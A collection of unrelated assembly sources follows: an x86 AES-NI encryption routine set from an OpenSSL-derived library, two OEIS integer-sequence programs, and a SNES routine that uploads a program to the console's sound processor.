jc NEAR L$062xts_dec_short
shl ecx,4
mov ebx,16
sub ebx,ecx
lea edx,[32+ecx*1+edx]
jmp NEAR L$063xts_dec_loop6
align 16
L$063xts_dec_loop6:
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [16+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [32+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [48+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm7,xmm0,19
movdqa [64+esp],xmm1
paddq xmm1,xmm1
movups xmm0,[ebp]
pand xmm7,xmm3
movups xmm2,[esi]
pxor xmm7,xmm1
mov ecx,ebx
movdqu xmm3,[16+esi]
xorps xmm2,xmm0
movdqu xmm4,[32+esi]
pxor xmm3,xmm0
movdqu xmm5,[48+esi]
pxor xmm4,xmm0
movdqu xmm6,[64+esi]
pxor xmm5,xmm0
movdqu xmm1,[80+esi]
pxor xmm6,xmm0
lea esi,[96+esi]
pxor xmm2,[esp]
movdqa [80+esp],xmm7
pxor xmm7,xmm1
movups xmm1,[16+ebp]
pxor xmm3,[16+esp]
pxor xmm4,[32+esp]
db 102,15,56,222,209
pxor xmm5,[48+esp]
pxor xmm6,[64+esp]
db 102,15,56,222,217
pxor xmm7,xmm0
movups xmm0,[32+ebp]
db 102,15,56,222,225
db 102,15,56,222,233
db 102,15,56,222,241
db 102,15,56,222,249
call L$_aesni_decrypt6_enter
movdqa xmm1,[80+esp]
pxor xmm0,xmm0
xorps xmm2,[esp]
pcmpgtd xmm0,xmm1
xorps xmm3,[16+esp]
movups [edi],xmm2
xorps xmm4,[32+esp]
movups [16+edi],xmm3
xorps xmm5,[48+esp]
movups [32+edi],xmm4
xorps xmm6,[64+esp]
movups [48+edi],xmm5
xorps xmm7,xmm1
movups [64+edi],xmm6
pshufd xmm2,xmm0,19
movups [80+edi],xmm7
lea edi,[96+edi]
movdqa xmm3,[96+esp]
pxor xmm0,xmm0
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
sub eax,96
jnc NEAR L$063xts_dec_loop6
mov ecx,DWORD [240+ebp]
mov edx,ebp
mov ebx,ecx
L$062xts_dec_short:
add eax,96
jz NEAR L$064xts_dec_done6x
movdqa xmm5,xmm1
cmp eax,32
jb NEAR L$065xts_dec_one
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
je NEAR L$066xts_dec_two
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm6,xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
cmp eax,64
jb NEAR L$067xts_dec_three
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm7,xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
movdqa [esp],xmm5
movdqa [16+esp],xmm6
je NEAR L$068xts_dec_four
movdqa [32+esp],xmm7
pshufd xmm7,xmm0,19
movdqa [48+esp],xmm1
paddq xmm1,xmm1
pand xmm7,xmm3
pxor xmm7,xmm1
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
pxor xmm2,[esp]
movdqu xmm5,[48+esi]
pxor xmm3,[16+esp]
movdqu xmm6,[64+esi]
pxor xmm4,[32+esp]
lea esi,[80+esi]
pxor xmm5,[48+esp]
movdqa [64+esp],xmm7
pxor xmm6,xmm7
call __aesni_decrypt6
movaps xmm1,[64+esp]
xorps xmm2,[esp]
xorps xmm3,[16+esp]
xorps xmm4,[32+esp]
movups [edi],xmm2
xorps xmm5,[48+esp]
movups [16+edi],xmm3
xorps xmm6,xmm1
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
lea edi,[80+edi]
jmp NEAR L$069xts_dec_done
align 16
L$065xts_dec_one:
movups xmm2,[esi]
lea esi,[16+esi]
xorps xmm2,xmm5
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$070dec1_loop_12:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$070dec1_loop_12
db 102,15,56,223,209
xorps xmm2,xmm5
movups [edi],xmm2
lea edi,[16+edi]
movdqa xmm1,xmm5
jmp NEAR L$069xts_dec_done
align 16
L$066xts_dec_two:
movaps xmm6,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
lea esi,[32+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
call __aesni_decrypt2
xorps xmm2,xmm5
xorps xmm3,xmm6
movups [edi],xmm2
movups [16+edi],xmm3
lea edi,[32+edi]
movdqa xmm1,xmm6
jmp NEAR L$069xts_dec_done
align 16
L$067xts_dec_three:
movaps xmm7,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
movups xmm4,[32+esi]
lea esi,[48+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
xorps xmm4,xmm7
call __aesni_decrypt3
xorps xmm2,xmm5
xorps xmm3,xmm6
xorps xmm4,xmm7
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
lea edi,[48+edi]
movdqa xmm1,xmm7
jmp NEAR L$069xts_dec_done
align 16
L$068xts_dec_four:
movaps xmm6,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
movups xmm4,[32+esi]
xorps xmm2,[esp]
movups xmm5,[48+esi]
lea esi,[64+esi]
xorps xmm3,[16+esp]
xorps xmm4,xmm7
xorps xmm5,xmm6
call __aesni_decrypt4
xorps xmm2,[esp]
xorps xmm3,[16+esp]
xorps xmm4,xmm7
movups [edi],xmm2
xorps xmm5,xmm6
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
lea edi,[64+edi]
movdqa xmm1,xmm6
jmp NEAR L$069xts_dec_done
align 16
L$064xts_dec_done6x:
mov eax,DWORD [112+esp]
and eax,15
jz NEAR L$071xts_dec_ret
mov DWORD [112+esp],eax
jmp NEAR L$072xts_dec_only_one_more
align 16
L$069xts_dec_done:
mov eax,DWORD [112+esp]
pxor xmm0,xmm0
and eax,15
jz NEAR L$071xts_dec_ret
pcmpgtd xmm0,xmm1
mov DWORD [112+esp],eax
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm3,[96+esp]
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
L$072xts_dec_only_one_more:
pshufd xmm5,xmm0,19
movdqa xmm6,xmm1
paddq xmm1,xmm1
pand xmm5,xmm3
pxor xmm5,xmm1
mov edx,ebp
mov ecx,ebx
movups xmm2,[esi]
xorps xmm2,xmm5
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$073dec1_loop_13:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$073dec1_loop_13
db 102,15,56,223,209
xorps xmm2,xmm5
movups [edi],xmm2
L$074xts_dec_steal:
movzx ecx,BYTE [16+esi]
movzx edx,BYTE [edi]
lea esi,[1+esi]
mov BYTE [edi],cl
mov BYTE [16+edi],dl
lea edi,[1+edi]
sub eax,1
jnz NEAR L$074xts_dec_steal
sub edi,DWORD [112+esp]
mov edx,ebp
mov ecx,ebx
movups xmm2,[edi]
xorps xmm2,xmm6
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$075dec1_loop_14:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$075dec1_loop_14
db 102,15,56,223,209
xorps xmm2,xmm6
movups [edi],xmm2
L$071xts_dec_ret:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
movdqa [esp],xmm0
pxor xmm3,xmm3
movdqa [16+esp],xmm0
pxor xmm4,xmm4
movdqa [32+esp],xmm0
pxor xmm5,xmm5
movdqa [48+esp],xmm0
pxor xmm6,xmm6
movdqa [64+esp],xmm0
pxor xmm7,xmm7
movdqa [80+esp],xmm0
mov esp,DWORD [116+esp]
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_cbc_encrypt
align 16
_aes_hw_cbc_encrypt:
L$_aes_hw_cbc_encrypt_begin:
push ebp
push ebx
push esi
push edi
mov esi,DWORD [20+esp]
mov ebx,esp
mov edi,DWORD [24+esp]
sub ebx,24
mov eax,DWORD [28+esp]
and ebx,-16
mov edx,DWORD [32+esp]
mov ebp,DWORD [36+esp]
test eax,eax
jz NEAR L$076cbc_abort
cmp DWORD [40+esp],0
xchg ebx,esp
movups xmm7,[ebp]
mov ecx,DWORD [240+edx]
mov ebp,edx
mov DWORD [16+esp],ebx
mov ebx,ecx
je NEAR L$077cbc_decrypt
movaps xmm2,xmm7
cmp eax,16
jb NEAR L$078cbc_enc_tail
sub eax,16
jmp NEAR L$079cbc_enc_loop
align 16
L$079cbc_enc_loop:
movups xmm7,[esi]
lea esi,[16+esi]
movups xmm0,[edx]
movups xmm1,[16+edx]
xorps xmm7,xmm0
lea edx,[32+edx]
xorps xmm2,xmm7
L$080enc1_loop_15:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$080enc1_loop_15
db 102,15,56,221,209
mov ecx,ebx
mov edx,ebp
movups [edi],xmm2
lea edi,[16+edi]
sub eax,16
jnc NEAR L$079cbc_enc_loop
add eax,16
jnz NEAR L$078cbc_enc_tail
movaps xmm7,xmm2
pxor xmm2,xmm2
jmp NEAR L$081cbc_ret
L$078cbc_enc_tail:
mov ecx,eax
dd 2767451785
mov ecx,16
sub ecx,eax
xor eax,eax
dd 2868115081
lea edi,[edi-16]
mov ecx,ebx
mov esi,edi
mov edx,ebp
jmp NEAR L$079cbc_enc_loop
align 16
L$077cbc_decrypt:
cmp eax,80
jbe NEAR L$082cbc_dec_tail
movaps [esp],xmm7
sub eax,80
jmp NEAR L$083cbc_dec_loop6_enter
align 16
L$084cbc_dec_loop6:
movaps [esp],xmm0
movups [edi],xmm7
lea edi,[16+edi]
L$083cbc_dec_loop6_enter:
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
movdqu xmm5,[48+esi]
movdqu xmm6,[64+esi]
movdqu xmm7,[80+esi]
call __aesni_decrypt6
movups xmm1,[esi]
movups xmm0,[16+esi]
xorps xmm2,[esp]
xorps xmm3,xmm1
movups xmm1,[32+esi]
xorps xmm4,xmm0
movups xmm0,[48+esi]
xorps xmm5,xmm1
movups xmm1,[64+esi]
xorps xmm6,xmm0
movups xmm0,[80+esi]
xorps xmm7,xmm1
movups [edi],xmm2
movups [16+edi],xmm3
lea esi,[96+esi]
movups [32+edi],xmm4
mov ecx,ebx
movups [48+edi],xmm5
mov edx,ebp
movups [64+edi],xmm6
lea edi,[80+edi]
sub eax,96
ja NEAR L$084cbc_dec_loop6
movaps xmm2,xmm7
movaps xmm7,xmm0
add eax,80
jle NEAR L$085cbc_dec_clear_tail_collected
movups [edi],xmm2
lea edi,[16+edi]
L$082cbc_dec_tail:
movups xmm2,[esi]
movaps xmm6,xmm2
cmp eax,16
jbe NEAR L$086cbc_dec_one
movups xmm3,[16+esi]
movaps xmm5,xmm3
cmp eax,32
jbe NEAR L$087cbc_dec_two
movups xmm4,[32+esi]
cmp eax,48
jbe NEAR L$088cbc_dec_three
movups xmm5,[48+esi]
cmp eax,64
jbe NEAR L$089cbc_dec_four
movups xmm6,[64+esi]
movaps [esp],xmm7
movups xmm2,[esi]
xorps xmm7,xmm7
call __aesni_decrypt6
movups xmm1,[esi]
movups xmm0,[16+esi]
xorps xmm2,[esp]
xorps xmm3,xmm1
movups xmm1,[32+esi]
xorps xmm4,xmm0
movups xmm0,[48+esi]
xorps xmm5,xmm1
movups xmm7,[64+esi]
xorps xmm6,xmm0
movups [edi],xmm2
movups [16+edi],xmm3
pxor xmm3,xmm3
movups [32+edi],xmm4
pxor xmm4,xmm4
movups [48+edi],xmm5
pxor xmm5,xmm5
lea edi,[64+edi]
movaps xmm2,xmm6
pxor xmm6,xmm6
sub eax,80
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$086cbc_dec_one:
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$091dec1_loop_16:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$091dec1_loop_16
db 102,15,56,223,209
xorps xmm2,xmm7
movaps xmm7,xmm6
sub eax,16
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$087cbc_dec_two:
call __aesni_decrypt2
xorps xmm2,xmm7
xorps xmm3,xmm6
movups [edi],xmm2
movaps xmm2,xmm3
pxor xmm3,xmm3
lea edi,[16+edi]
movaps xmm7,xmm5
sub eax,32
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$088cbc_dec_three:
call __aesni_decrypt3
xorps xmm2,xmm7
xorps xmm3,xmm6
xorps xmm4,xmm5
movups [edi],xmm2
movaps xmm2,xmm4
pxor xmm4,xmm4
movups [16+edi],xmm3
pxor xmm3,xmm3
lea edi,[32+edi]
movups xmm7,[32+esi]
sub eax,48
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$089cbc_dec_four:
call __aesni_decrypt4
movups xmm1,[16+esi]
movups xmm0,[32+esi]
xorps xmm2,xmm7
movups xmm7,[48+esi]
xorps xmm3,xmm6
movups [edi],xmm2
xorps xmm4,xmm1
movups [16+edi],xmm3
pxor xmm3,xmm3
xorps xmm5,xmm0
movups [32+edi],xmm4
pxor xmm4,xmm4
lea edi,[48+edi]
movaps xmm2,xmm5
pxor xmm5,xmm5
sub eax,64
jmp NEAR L$090cbc_dec_tail_collected
align 16
L$085cbc_dec_clear_tail_collected:
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
pxor xmm6,xmm6
L$090cbc_dec_tail_collected:
and eax,15
jnz NEAR L$092cbc_dec_tail_partial
movups [edi],xmm2
pxor xmm0,xmm0
jmp NEAR L$081cbc_ret
align 16
L$092cbc_dec_tail_partial:
movaps [esp],xmm2
pxor xmm0,xmm0
mov ecx,16
mov esi,esp
sub ecx,eax
dd 2767451785
movdqa [esp],xmm2
L$081cbc_ret:
mov esp,DWORD [16+esp]
mov ebp,DWORD [36+esp]
pxor xmm2,xmm2
pxor xmm1,xmm1
movups [ebp],xmm7
pxor xmm7,xmm7
L$076cbc_abort:
pop edi
pop esi
pop ebx
pop ebp
ret
align 16
__aesni_set_encrypt_key:
push ebp
push ebx
test eax,eax
jz NEAR L$093bad_pointer
test edx,edx
jz NEAR L$093bad_pointer
call L$094pic
L$094pic:
pop ebx
lea ebx,[(L$key_const-L$094pic)+ebx]
lea ebp,[_OPENSSL_ia32cap_P]
movups xmm0,[eax]
xorps xmm4,xmm4
mov ebp,DWORD [4+ebp]
lea edx,[16+edx]
and ebp,268437504
cmp ecx,256
je NEAR L$09514rounds
cmp ecx,192
je NEAR L$09612rounds
cmp ecx,128
jne NEAR L$097bad_keybits
align 16
L$09810rounds:
cmp ebp,268435456
je NEAR L$09910rounds_alt
mov ecx,9
movups [edx-16],xmm0
db 102,15,58,223,200,1
call L$100key_128_cold
db 102,15,58,223,200,2
call L$101key_128
db 102,15,58,223,200,4
call L$101key_128
db 102,15,58,223,200,8
call L$101key_128
db 102,15,58,223,200,16
call L$101key_128
db 102,15,58,223,200,32
call L$101key_128
db 102,15,58,223,200,64
call L$101key_128
db 102,15,58,223,200,128
call L$101key_128
db 102,15,58,223,200,27
call L$101key_128
db 102,15,58,223,200,54
call L$101key_128
movups [edx],xmm0
mov DWORD [80+edx],ecx
jmp NEAR L$102good_key
align 16
L$101key_128:
movups [edx],xmm0
lea edx,[16+edx]
L$100key_128_cold:
shufps xmm4,xmm0,16
xorps xmm0,xmm4
shufps xmm4,xmm0,140
xorps xmm0,xmm4
shufps xmm1,xmm1,255
xorps xmm0,xmm1
ret
align 16
L$09910rounds_alt:
movdqa xmm5,[ebx]
mov ecx,8
movdqa xmm4,[32+ebx]
movdqa xmm2,xmm0
movdqu [edx-16],xmm0
L$103loop_key128:
db 102,15,56,0,197
db 102,15,56,221,196
pslld xmm4,1
lea edx,[16+edx]
movdqa xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm2,xmm3
pxor xmm0,xmm2
movdqu [edx-16],xmm0
movdqa xmm2,xmm0
dec ecx
jnz NEAR L$103loop_key128
movdqa xmm4,[48+ebx]
db 102,15,56,0,197
db 102,15,56,221,196
pslld xmm4,1
movdqa xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm2,xmm3
pxor xmm0,xmm2
movdqu [edx],xmm0
movdqa xmm2,xmm0
db 102,15,56,0,197
db 102,15,56,221,196
movdqa xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm3,xmm2
pslldq xmm2,4
pxor xmm2,xmm3
pxor xmm0,xmm2
movdqu [16+edx],xmm0
mov ecx,9
mov DWORD [96+edx],ecx
jmp NEAR L$102good_key
align 16
L$09612rounds:
movq xmm2,[16+eax]
cmp ebp,268435456
je NEAR L$10412rounds_alt
mov ecx,11
movups [edx-16],xmm0
db 102,15,58,223,202,1
call L$105key_192a_cold
db 102,15,58,223,202,2
call L$106key_192b
db 102,15,58,223,202,4
call L$107key_192a
db 102,15,58,223,202,8
call L$106key_192b
db 102,15,58,223,202,16
call L$107key_192a
db 102,15,58,223,202,32
call L$106key_192b
db 102,15,58,223,202,64
call L$107key_192a
db 102,15,58,223,202,128
call L$106key_192b
movups [edx],xmm0
mov DWORD [48+edx],ecx
jmp NEAR L$102good_key
align 16
L$107key_192a:
movups [edx],xmm0
lea edx,[16+edx]
align 16
L$105key_192a_cold:
movaps xmm5,xmm2
L$108key_192b_warm:
shufps xmm4,xmm0,16
movdqa xmm3,xmm2
xorps xmm0,xmm4
shufps xmm4,xmm0,140
pslldq xmm3,4
xorps xmm0,xmm4
pshufd xmm1,xmm1,85
pxor xmm2,xmm3
pxor xmm0,xmm1
pshufd xmm3,xmm0,255
pxor xmm2,xmm3
ret
align 16
L$106key_192b:
movaps xmm3,xmm0
shufps xmm5,xmm0,68
movups [edx],xmm5
shufps xmm3,xmm2,78
movups [16+edx],xmm3
lea edx,[32+edx]
jmp NEAR L$108key_192b_warm
align 16
L$10412rounds_alt:
movdqa xmm5,[16+ebx]
movdqa xmm4,[32+ebx]
mov ecx,8
movdqu [edx-16],xmm0
L$109loop_key192:
movq [edx],xmm2
movdqa xmm1,xmm2
db 102,15,56,0,213
db 102,15,56,221,212
pslld xmm4,1
lea edx,[24+edx]
movdqa xmm3,xmm0
pslldq xmm0,4
pxor xmm3,xmm0
pslldq xmm0,4
pxor xmm3,xmm0
pslldq xmm0,4
pxor xmm0,xmm3
pshufd xmm3,xmm0,255
pxor xmm3,xmm1
pslldq xmm1,4
pxor xmm3,xmm1
pxor xmm0,xmm2
pxor xmm2,xmm3
movdqu [edx-16],xmm0
dec ecx
jnz NEAR L$109loop_key192
mov ecx,11
mov DWORD [32+edx],ecx
jmp NEAR L$102good_key
align 16
L$09514rounds:
movups xmm2,[16+eax]
lea edx,[16+edx]
cmp ebp,268435456
je NEAR L$11014rounds_alt
mov ecx,13
movups [edx-32],xmm0
movups [edx-16],xmm2
db 102,15,58,223,202,1
call L$111key_256a_cold
db 102,15,58,223,200,1
call L$112key_256b
db 102,15,58,223,202,2
call L$113key_256a
db 102,15,58,223,200,2
call L$112key_256b
db 102,15,58,223,202,4
call L$113key_256a
db 102,15,58,223,200,4
call L$112key_256b
db 102,15,58,223,202,8
call L$113key_256a
db 102,15,58,223,200,8
call L$112key_256b
db 102,15,58,223,202,16
call L$113key_256a
db 102,15,58,223,200,16
call L$112key_256b
db 102,15,58,223,202,32
call L$113key_256a
db 102,15,58,223,200,32
call L$112key_256b
db 102,15,58,223,202,64
call L$113key_256a
movups [edx],xmm0
mov DWORD [16+edx],ecx
xor eax,eax
jmp NEAR L$102good_key
align 16
L$113key_256a:
movups [edx],xmm2
lea edx,[16+edx]
L$111key_256a_cold:
shufps xmm4,xmm0,16
xorps xmm0,xmm4
shufps xmm4,xmm0,140
xorps xmm0,xmm4
shufps xmm1,xmm1,255
xorps xmm0,xmm1
ret
align 16
L$112key_256b:
movups [edx],xmm0
lea edx,[16+edx]
shufps xmm4,xmm2,16
xorps xmm2,xmm4
shufps xmm4,xmm2,140
xorps xmm2,xmm4
shufps xmm1,xmm1,170
xorps xmm2,xmm1
ret
align 16
L$11014rounds_alt:
movdqa xmm5,[ebx]
movdqa xmm4,[32+ebx]
mov ecx,7
movdqu [edx-32],xmm0
movdqa xmm1,xmm2
movdqu [edx-16],xmm2
L$114loop_key256:
db 102,15,56,0,213
db 102,15,56,221,212
movdqa xmm3,xmm0
pslldq xmm0,4
pxor xmm3,xmm0
pslldq xmm0,4
pxor xmm3,xmm0
pslldq xmm0,4
pxor xmm0,xmm3
pslld xmm4,1
pxor xmm0,xmm2
movdqu [edx],xmm0
dec ecx
jz NEAR L$115done_key256
pshufd xmm2,xmm0,255
pxor xmm3,xmm3
db 102,15,56,221,211
movdqa xmm3,xmm1
pslldq xmm1,4
pxor xmm3,xmm1
pslldq xmm1,4
pxor xmm3,xmm1
pslldq xmm1,4
pxor xmm1,xmm3
pxor xmm2,xmm1
movdqu [16+edx],xmm2
lea edx,[32+edx]
movdqa xmm1,xmm2
jmp NEAR L$114loop_key256
L$115done_key256:
mov ecx,13
mov DWORD [16+edx],ecx
L$102good_key:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
xor eax,eax
pop ebx
pop ebp
ret
align 4
L$093bad_pointer:
mov eax,-1
pop ebx
pop ebp
ret
align 4
L$097bad_keybits:
pxor xmm0,xmm0
mov eax,-2
pop ebx
pop ebp
ret
global _aes_hw_set_encrypt_key
align 16
_aes_hw_set_encrypt_key:
L$_aes_hw_set_encrypt_key_begin:
%ifndef NDEBUG
push ebx
push edx
call L$116pic
L$116pic:
pop ebx
lea ebx,[(_BORINGSSL_function_hit+3-L$116pic)+ebx]
mov edx,1
mov BYTE [ebx],dl
pop edx
pop ebx
%endif
mov eax,DWORD [4+esp]
mov ecx,DWORD [8+esp]
mov edx,DWORD [12+esp]
call __aesni_set_encrypt_key
ret
global _aes_hw_set_decrypt_key
align 16
_aes_hw_set_decrypt_key:
L$_aes_hw_set_decrypt_key_begin:
mov eax,DWORD [4+esp]
mov ecx,DWORD [8+esp]
mov edx,DWORD [12+esp]
call __aesni_set_encrypt_key
mov edx,DWORD [12+esp]
shl ecx,4
test eax,eax
jnz NEAR L$117dec_key_ret
lea eax,[16+ecx*1+edx]
movups xmm0,[edx]
movups xmm1,[eax]
movups [eax],xmm0
movups [edx],xmm1
lea edx,[16+edx]
lea eax,[eax-16]
L$118dec_key_inverse:
movups xmm0,[edx]
movups xmm1,[eax]
db 102,15,56,219,192
db 102,15,56,219,201
lea edx,[16+edx]
lea eax,[eax-16]
movups [16+eax],xmm0
movups [edx-16],xmm1
cmp eax,edx
ja NEAR L$118dec_key_inverse
movups xmm0,[edx]
db 102,15,56,219,192
movups [edx],xmm0
pxor xmm0,xmm0
pxor xmm1,xmm1
xor eax,eax
L$117dec_key_ret:
ret
align 64
L$key_const:
dd 202313229,202313229,202313229,202313229
dd 67569157,67569157,67569157,67569157
dd 1,1,1,1
dd 27,27,27,27
db 65,69,83,32,102,111,114,32,73,110,116,101,108,32,65,69
db 83,45,78,73,44,32,67,82,89,80,84,79,71,65,77,83
db 32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115
db 115,108,46,111,114,103,62,0
segment .bss
common _OPENSSL_ia32cap_P 16
|
; A141534: Derived from the centered polygonal numbers: start with the first triangular number, then the sum of the first square number and the second triangular number, then the sum of first pentagonal number, the second square number and the third triangular number, and so on and so on...
; 1,4,11,26,55,105,184,301,466,690,985,1364,1841,2431,3150,4015,5044,6256,7671,9310,11195,13349,15796,18561,21670,25150,29029,33336,38101,43355,49130,55459,62376,69916,78115,87010,96639,107041,118256,130325,143290,157194,172081,187996,204985,223095,242374,262871,284636,307720,332175,358054,385411,414301,444780,476905,510734,546326,583741,623040,664285,707539,752866,800331,850000,901940,956219,1012906,1072071,1133785,1198120,1265149,1334946,1407586,1483145,1561700,1643329,1728111,1816126,1907455,2002180,2100384,2202151,2307566,2416715,2529685,2646564,2767441,2892406,3021550,3154965,3292744,3434981,3581771,3733210,3889395,4050424,4216396,4387411,4563570,4744975,4931729,5123936,5321701,5525130,5734330,5949409,6170476,6397641,6631015,6870710,7116839,7369516,7628856,7894975,8167990,8448019,8735181,9029596,9331385,9640670,9957574,10282221,10614736,10955245,11303875,11660754,12026011,12399776,12782180,13173355,13573434,13982551,14400841,14828440,15265485,15712114,16168466,16634681,17110900,17597265,18093919,18601006,19118671,19647060,20186320,20736599,21298046,21870811,22455045,23050900,23658529,24278086,24909726,25553605,26209880,26878709,27560251,28254666,28962115,29682760,30416764,31164291,31925506,32700575,33489665,34292944,35110581,35942746,36789610,37651345,38528124,39420121,40327511,41250470,42189175,43143804,44114536,45101551,46105030,47125155,48162109,49216076,50287241,51375790,52481910,53605789,54747616,55907581,57085875,58282690,59498219,60732656,61986196,63259035,64551370,65863399,67195321,68547336,69919645,71312450,72725954,74160361,75615876,77092705,78591055,80111134,81653151,83217316,84803840,86412935,88044814,89699691,91377781,93079300,94804465,96553494,98326606,100124021,101945960,103792645,105664299,107561146,109483411,111431320,113405100,115404979,117431186,119483951,121563505,123670080,125803909,127965226,130154266,132371265,134616460,136890089,139192391,141523606,143883975,146273740,148693144,151142431,153621846,156131635,158672045,161243324,163845721,166479486,169144870
mov $12,$0
mov $14,$0
add $14,1
lpb $14
clr $0,12
mov $0,$12
sub $14,1
sub $0,$14
mov $9,$0
mov $11,$0
add $11,1
lpb $11
mov $0,$9
sub $11,1
sub $0,$11
mov $2,$0
bin $2,2
mov $5,$0
add $5,$0
trn $5,5
add $5,$0
add $5,$2
add $5,1
add $10,$5
lpe
add $13,$10
lpe
mov $1,$13
|
; A263941: Minimal most likely sum for a roll of n 8-sided dice.
; 1,9,13,18,22,27,31,36,40,45,49,54,58,63,67,72,76,81,85,90,94,99,103,108,112,117,121,126,130,135,139,144,148,153,157,162,166,171,175,180,184,189,193,198,202,207,211,216,220,225
mov $2,$0
mul $0,8
sub $0,1
mov $1,1
add $2,$0
div $2,2
lpb $0,1
mov $0,2
add $1,$2
add $1,4
lpe
|
.include "header.inc"
.include "snesregs.inc"
.include "misc_macros.inc"
.include "zeropage.inc"
.include "puzzles.inc"
.include "grid.inc"
.bank 0 slot 1
.ramsection "sound_variables" SLOT RAM_SLOT
kick: db
.ends
.16BIT
.section "apu_payload" FREE
apu_dst_address: .dw 200h
apu_entry_point: .dw 200h
.ends
.section "sound_code" FREE
.define APU_HANDSHAKE APUIO0
.define APU_COMMAND APUIO1
.define APU_DATA APUIO1
.define APU_DST_ADDR APUIO2
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Load the APU program
;
; based on Uploader pseudo code from the fullsnes documentation
sound_loadApu:
pushall
A8
XY16
ldx #0
; Wait until Word[2140h]=BBAAh
@wait_bbaa;
ldy APU_HANDSHAKE
cpy #$BBAA
bne @wait_bbaa
; kick=CCh ;start-code for first command
lda #$cc
sta kick
@next_block:
ldy apu_dst_address
sty APU_DST_ADDR ; usually 200h or higher (above stack and I/O ports)
lda #1
sta APU_COMMAND ; command=transfer (can be any non-zero value)
lda kick
sta APU_HANDSHAKE ; start command (CCh on first block)
@wait_handshake:
lda APU_HANDSHAKE
cmp kick
bne @wait_handshake
@blockdataloop:
lda apu_payload.L, X
sta APU_DATA ; send data byte
txa
sta APU_HANDSHAKE ; send index LSB (mark data available)
@waitDataAck:
cmp APU_HANDSHAKE
bne @waitDataAck
inx
cpx #_sizeof_apu_payload
bne @blockdataloop
; kick=(index+2 AND FFh) OR 1 ;-kick for next command (must be bigger than last index+1, and must be non-zero)
txa
clc
adc #<_sizeof_apu_payload
adc #2
ora #1
sta kick
@startit:
ldy apu_entry_point
sty APU_DST_ADDR ; entrypoint, must be below FFC0h (ROM region)
stz APU_COMMAND ; command=entry (must be zero value)
lda kick
sta APU_HANDSHAKE
@waitStartAck:
cmp APU_HANDSHAKE
bne @waitStartAck
@done:
popall
rts
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
; Send a command. Command in 8-bit A.
;
sound_sendCommand:
pushall
A8
sta APU_COMMAND
inc kick
lda kick
sta APU_HANDSHAKE
@waitack:
cmp APU_HANDSHAKE
bne @waitack
popall
rts
